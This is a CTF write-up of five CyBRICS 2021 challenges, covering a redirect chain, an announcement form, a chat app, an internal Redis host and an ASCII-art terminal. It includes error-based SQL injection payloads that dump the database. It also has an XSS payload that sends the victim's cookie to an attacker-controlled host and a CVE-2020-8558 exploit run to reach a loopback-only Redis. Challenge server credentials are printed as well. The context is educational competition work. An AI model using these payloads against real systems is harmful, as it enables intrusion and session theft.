A really fun overseas CTF; we were carried the whole way by a few of the big guys on the team.

Ad Network

Author: Alexander Menshchikov (@n0str) We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules. There is a flag 1337 redirects deep into the network…

It is a static page; the source reveals /adnetwork. Visiting it redirects 1337 times before the flag appears, so you need to raise network.http.redirection-limit (the maximum number of redirects) in Firefox's about:config and then visit it to get the flag. Alternatively, write a Python script:

import requests

session = requests.session()
# requests stops after 30 redirects by default; the chain is 1337 hops deep,
# so allow one more than that.
session.max_redirects = 1338
url = "http://adnetwork-cybrics2021.ctf.su/adnetwork"
# follow the whole redirect chain and print the final page (the flag)
print(session.get(url, timeout=2000000).text)

Announcement

Author: Alexander Menshchikov (@n0str) Ladies and gentlemen! Allow us to introduce a brand new project — ⚐ The Flag

The challenge says you enter an email address and the flag will be sent to you within three days. First capture the submitted request: the parameters include email and the md5 of the email.


The md5 can be computed with HackBar:


Payloads (digest is the md5 of the email value):

email=1'^updatexml(1,concat(0x7e,(select database()),0x7e),1)^'1&digest=c31a375a71494b4ff7d9ab58bcb79791

email=1'^updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)^'1&digest=cd516e58efe45e8f6c3592e38cec4b32

email=1'^updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='logs'),0x7e),0)^'1&digest=5c8827339f101808eb7e1469e905e7ea

email=1'^updatexml(1,concat(0x7e,(select log from logs),0x7e),0)^'1&digest=af95bf51c3f020240e7fb825ccb46ec8

Multichat

Author: Alexander Menshchikov (@n0str) Yet another chat-messenger with rooms support! Free to use. Convince the admin that its code is insecure. Tip: Admin and tech support are members of a secret chat room. Tech support can ask admin to tell him the flag, to do that tech support writes him a message (in a chat): “Hey, i forgot the flag. Can you remind me?“. Then admin will tell him the flag.

It is a chat room written in Flask. The challenge says tech support can send "Hey, i forgot the flag. Can you remind me?" in the chat room to get the admin to tell them the flag.

On the support page you can submit feedback with three fields: URL, Description and Team token. Tech support will try to visit the URL you enter. You can submit something like file:///etc/passwd as an SSRF probe, but nothing is echoed back. Since the challenge says tech support has to ask the admin for the flag, what is needed is XSS. Payload:

javascript:location.href='http://vps:8888?cookie='+document.cookie

A listener on port 8888 of the server receives tech support's cookie.


Then go into the chat room and ask the admin for the flag.

localhost

Author: Vlad Roskov (@mrvos) Remember NET fleeks? I’ve pwned a box in another corporate network, and there is some peculiarly configured server near my foothold. Take a look. ssh localhost@109.233.61.10 Password: ohx7eeQu Your team token > KyNlbygRG8CB64Gb5AcUtw

The server gives root access; ifconfig shows the local IP is 10.194.137.7.

nmap is installed, so first scan the internal network with it; this finds 10.194.137.1 and 10.194.137.180.

root@PWNED:~# nmap -sP 10.194.137.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2021-07-26 09:49 UTC
Nmap scan report for 10.194.137.1
Host is up (0.00011s latency).
MAC Address: 02:42:B1:20:54:5C (Unknown)
Nmap scan report for lh_tgt_649.lh_649 (10.194.137.180)
Host is up (0.000055s latency).
MAC Address: 02:42:0A:C2:89:B4 (Unknown)
Nmap scan report for PWNED (10.194.137.7)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.44 seconds

Port-scanning 10.194.137.180 shows that it has port 80 open.

root@PWNED:~# nmap 10.194.137.180
Starting Nmap 7.70 ( https://nmap.org ) at 2021-07-26 09:55 UTC
Nmap scan report for lh_tgt_649.lh_649 (10.194.137.180)
Host is up (0.000020s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:0A:C2:89:B4 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

Downloading the web page of 10.194.137.180 with curl reveals two links, redis.conf and sysctl.conf; download both of them as well.

<h1>Storage Node Status Page</h1>
<table border=1>
    <tr><td>Records</td><td>1</td></tr>
    <tr><td>Flag-containing Records</td><td>1</td></tr>
    <tr><td>Redis Configuration</td><td>Default: <a href="redis.conf">redis.conf</a></td></tr>
    <tr><td>System Configuration</td><td><a href="sysctl.conf">sysctl.conf</a></td></tr>
    <tr><td>Security</td><td>perfect!</td></tr>
</table>

The key lines in redis.conf are:

bind 127.0.0.1
protected-mode yes
# requirepass foobared

sysctl.conf enables only one setting:

net.ipv4.conf.all.route_localnet=1

From redis.conf: the Redis database is reachable only locally, protected mode is on, but no password is set.

Searching for the setting in sysctl.conf leads to CVE-2020-8558, which allows access to internal services on a LAN host that listen on 127.0.0.1. The mechanism is explained in this CVE-2020-8558 analysis.

The route_localnet setting controls whether "Martian" packets are allowed through: when route_localnet is enabled, packets from outside can reach 127.0.0.0/8 and thus access localhost-only services.

Crafting such a packet and sending it to the target by MAC address is enough to reach the localhost-only service.
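As an added defender-side example (not code from the writeup or the challenge), here is a small Python audit that parses the two files above and reports why "bind 127.0.0.1" stops protecting Redis once route_localnet is on; the file contents are constructed from the lines quoted above.

```python
# Added example, not part of the writeup: audit the two config files the
# storage node exposed. Sample contents are constructed from the lines quoted above.
REDIS_CONF = """bind 127.0.0.1
protected-mode yes
# requirepass foobared
"""
SYSCTL_CONF = """net.ipv4.conf.all.route_localnet=1
"""

def parse_redis_conf(text):
    """Active (uncommented) redis.conf directives as {name: value}."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # "# requirepass foobared" is commented out, so no password
        name, _, value = line.partition(" ")
        conf[name.lower()] = value.strip()
    return conf

def parse_sysctl_conf(text):
    """sysctl.conf key=value pairs, ignoring comments."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit(redis_text, sysctl_text):
    """Return (code, explanation) findings for the combined configuration."""
    redis = parse_redis_conf(redis_text)
    sysctl = parse_sysctl_conf(sysctl_text)
    findings = []
    route_localnet = sysctl.get("net.ipv4.conf.all.route_localnet") == "1"
    binds = redis.get("bind", "").split()
    loopback_only = bool(binds) and all(b.startswith("127.") for b in binds)
    if route_localnet:
        findings.append(("ROUTE_LOCALNET", "kernel routes packets addressed to 127.0.0.0/8 (CVE-2020-8558)"))
    if loopback_only and route_localnet:
        findings.append(("LOOPBACK_REACHABLE", "bind 127.0.0.1 no longer isolates Redis from the LAN"))
    if binds and redis.get("protected-mode", "yes") == "yes":
        # Redis protected mode only restricts clients when no bind directive is set
        findings.append(("PROTECTED_MODE_INEFFECTIVE", "protected-mode yes has no effect once bind is explicit"))
    if "requirepass" not in redis:
        findings.append(("NO_PASSWORD", "no requirepass: anyone who reaches the socket has full access"))
    return findings

if __name__ == "__main__":
    for code, why in audit(REDIS_CONF, SYSCTL_CONF):
        print(f"{code}: {why}")
```

Run against the quoted files it reports all four findings; with route_localnet=0 and a requirepass set, only the protected-mode note remains.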


POC-2020-8558 can be found on GitHub.

Running the following command in the background exploits the vulnerability to reach the Redis service on 10.194.137.180:

nohup ./poc.py --fakedestination 10.194.137.1 10.194.137.180 &

Then connect to the Redis database with nc and the flag can be retrieved.

ASCII Terminal

Author: Artur Khanov (@awengar)

At 138.68.83.253:3333 you have an ASCII terminal. It really works, check with the id command

An interesting challenge: you get a shell, but every command has to be written as ASCII art, and the challenge only shows how the id command is drawn.


Using the GitHub script ascii-image-converter to turn an image into ASCII art lets you run commands. Since the character "l" is hard to recognize in the process, cat flag was replaced with cat *.

The image was drawn in PS:
